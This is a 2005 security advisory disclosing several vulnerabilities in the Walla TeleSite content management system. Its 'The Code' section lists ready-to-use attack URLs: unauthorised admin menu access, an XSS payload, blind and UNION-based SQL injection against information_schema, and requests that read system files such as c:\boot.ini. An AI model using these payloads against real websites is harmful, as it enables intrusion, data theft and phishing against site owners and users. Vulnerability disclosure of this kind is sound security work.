~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Walla TeleSite
Vendors: http://www.walla.co.il
Versions: 3.0 and perior
Platforms: Windows (ISAPI, a few vulnerabilities apply Linux too)
Bug: Multiple Vulnerabilities
Exploitation: Remote with browser
Date: 13 Nov 2005
Author: Rafi Nahum, Pokerface
e-mail: rafiware@bezeqint.net
web: Not Yet....but soon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Walla TeleSite is a Website Content Managment CGI web application.
It is very common amoung big israeli websites. It also used as a wrapper to
all the website links. It is also used by Walla.co.il and the Walla.com
Network.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
The TeleSite wraps the website with templates and ids to all the links.
The main navigation page ts.exe receives a parameter called 'tsurl' and it
does
not verifies/limits the numbers it receives, for example it should receive
0.22.1.0
if there is such a page, but it shouldn't 0.1.0.0 because it leads to the
private articles
menu of administrator.
In addition, further input filtering is missing in the webpages
Get/Post/Cookie parameters, this is a "feature" missing to this software
which causes
the web programmers using this website content managment engine to think
their parameters
are filtered, well they are'nt and this causes all their clients to have
Script and SQL Injections.
Where it is obvious that an SQL Injection may lead to complete remote
compromise if the
website and XSS to content spoofing, phishing, cookie stealing, D.O.S
attacks and more.
The TeleSite application also does not saves the errors to itself...in an
error.log or something
similar, it informs the attacker with the local path of the files it could
not open/access when
the attacker tempares with the website parameters. A remote attacker can
also enumerate
all the files on the machine by supplying their full path to ts.cgi after
the querystring.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Articles Menu Access:
--------------------------------
http://host/ts.exe?tsurl=0.1.0.0
Cross Site Scripting - XSS:
--------------------------------------
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr
ipt>alert()</script>
Blind SQL Injection:
-----------------------------
Proof Of Concept:
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='1
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='2
Exploitation:
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
y','poo','polo','nike'%20from%20information_schema.columns--
Local Path Disclosure:
-------------------------------
D:\TeleSite\online\templates\\example\sections\header
Local File Enumeration:
---------------------------------
http://host/ts.cgi?c:\boot.ini
http://host/ts.cgi?c:\boot1.ini
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Rafi Nahum, Pokerface
Greetings to The-Insider
"Pokerface is the name, reputation follows."